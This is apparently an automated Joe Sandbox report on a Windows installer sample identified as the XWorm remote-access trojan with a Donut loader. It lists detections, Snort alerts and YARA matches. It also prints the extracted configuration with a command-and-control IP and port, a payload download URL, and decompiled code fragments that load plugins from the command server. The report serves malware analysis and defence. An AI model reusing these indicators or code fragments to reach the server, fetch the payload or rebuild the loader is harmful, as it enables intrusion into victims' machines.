Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
31-o_Installer.exe

Overview

General Information

Sample name:31-o_Installer.exe
Analysis ID:1466307
MD5:5913d1b0d2fa0204e9e063467d000c3a
SHA1:50b4b4929edb21c17c49c40ac2a4050bd8f93768
SHA256:3192aea6cf0c450948b2006ca0ef28dcaf06aa4c9730ef8dc8199975064cdf72
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 31-o_Installer.exe (PID: 6672 cmdline: "C:\Users\user\Desktop\31-o_Installer.exe" MD5: 5913D1B0D2FA0204E9E063467D000C3A)
  • cleanup
{"C2 url": ["156.238.235.31"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x12155:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
C:\Users\Public\Downloads\ind.codWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\31[1].ccpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
00000000.00000002.4546753874.0000000002E60000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x6af2:$cnc4: POST / HTTP/1.1
    00000000.00000002.4547420805.0000000003131000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      Process Memory Space: 31-o_Installer.exe PID: 6672JoeSecurity_XWormYara detected XWormJoe Security
        SourceRuleDescriptionAuthorStrings
        0.2.31-o_Installer.exe.5320000.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
          0.2.31-o_Installer.exe.5320000.1.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x6af2:$cnc4: POST / HTTP/1.1
          0.2.31-o_Installer.exe.5320000.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.2.31-o_Installer.exe.5320000.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x4e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x4f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x5032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x4cf2:$cnc4: POST / HTTP/1.1
            No Sigma rule has matched
            Timestamp:07/02/24-19:21:18.807141
            SID:2855924
            Source Port:49712
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:25:04.354852
            SID:2852870
            Source Port:7000
            Destination Port:49712
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:24:55.688649
            SID:2852874
            Source Port:7000
            Destination Port:49712
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:25:04.355848
            SID:2852923
            Source Port:49712
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:22:57.227073
            SID:2853193
            Source Port:49712
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://guanlix.cn:881/31.ccpAvira URL Cloud: Label: malware
            Source: 00000000.00000002.4547420805.0000000003131000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["156.238.235.31"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
            Source: 31-o_Installer.exeReversingLabs: Detection: 26%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 31-o_Installer.exeJoe Sandbox ML: detected
            Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpackString decryptor: 156.238.235.31
            Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpackString decryptor: 7000
            Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpackString decryptor: <123456789>
            Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpackString decryptor: <Xwormmm>
            Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpackString decryptor: XWorm V5.6
            Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpackString decryptor: USB.exe
            Source: 31-o_Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 31-o_Installer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.6:49712 -> 156.238.235.31:7000
            Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 156.238.235.31:7000 -> 192.168.2.6:49712
            Source: TrafficSnort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.6:49712 -> 156.238.235.31:7000
            Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 156.238.235.31:7000 -> 192.168.2.6:49712
            Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.6:49712 -> 156.238.235.31:7000
            Source: Malware configuration extractorURLs: 156.238.235.31
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 881
            Source: unknownNetwork traffic detected: HTTP traffic on port 881 -> 49710
            Source: global trafficTCP traffic: 192.168.2.6:49710 -> 91.208.240.157:881
            Source: global trafficTCP traffic: 192.168.2.6:49712 -> 156.238.235.31:7000
            Source: Joe Sandbox ViewASN Name: XHOSTSERVERUS XHOSTSERVERUS
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_002625C8 __EH_prolog,InternetReadFile,0_2_002625C8
            Source: global trafficHTTP traffic detected: GET /31.ccp HTTP/1.1User-Agent: DownloadHost: guanlix.cn:881Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: guanlix.cn
            Source: 31-o_Installer.exeString found in binary or memory: http://guanlix.cn:881/31.ccp
            Source: 31-o_Installer.exe, 00000000.00000002.4547420805.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            barindex
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.31-o_Installer.exe.5320000.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.4546753874.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\Public\Downloads\ind.cod, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\31[1].ccp, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_0027007E0_2_0027007E
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_00275A2A0_2_00275A2A
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_0027738F0_2_0027738F
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_0026FBE90_2_0026FBE9
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_00270BD60_2_00270BD6
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_0027041C0_2_0027041C
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_002754D90_2_002754D9
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_002766570_2_00276657
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_00275F7B0_2_00275F7B
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_00277F4F0_2_00277F4F
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_002707EE0_2_002707EE
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_0533A4180_2_0533A418
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_05337CB00_2_05337CB0
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_05334E680_2_05334E68
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_0533EE5A0_2_0533EE5A
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_05335B400_2_05335B40
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_053307A00_2_053307A0
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_05334B200_2_05334B20
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: String function: 0026A9B0 appears 45 times
            Source: 31-o_Installer.exe, 00000000.00000000.2097104233.0000000000283000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewindos.exe. vs 31-o_Installer.exe
            Source: 31-o_Installer.exe, 00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 31-o_Installer.exe
            Source: 31-o_Installer.exeBinary or memory string: OriginalFilenamewindos.exe. vs 31-o_Installer.exe
            Source: 31-o_Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.31-o_Installer.exe.5320000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.4546753874.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\Public\Downloads\ind.cod, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\31[1].ccp, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: classification engineClassification label: mal100.troj.evad.winEXE@1/2@1/2
            Source: C:\Users\user\Desktop\31-o_Installer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\31[1].ccpJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeMutant created: NULL
            Source: C:\Users\user\Desktop\31-o_Installer.exeMutant created: \Sessions\1\BaseNamedObjects\DMTpmF9DC6Wmoh6u
            Source: 31-o_Installer.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\31-o_Installer.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 31-o_Installer.exeReversingLabs: Detection: 26%
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: 31-o_Installer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: 31-o_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 31-o_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 31-o_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 31-o_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 31-o_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, Messages.cs.Net Code: Memory
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_002740E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_002740E4
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_00264948 push eax; ret 0_2_00264966
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_0026A9F5 push ecx; ret 0_2_0026AA08
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_00266649 push ecx; ret 0_2_0026665C

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 881
            Source: unknownNetwork traffic detected: HTTP traffic on port 881 -> 49710
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
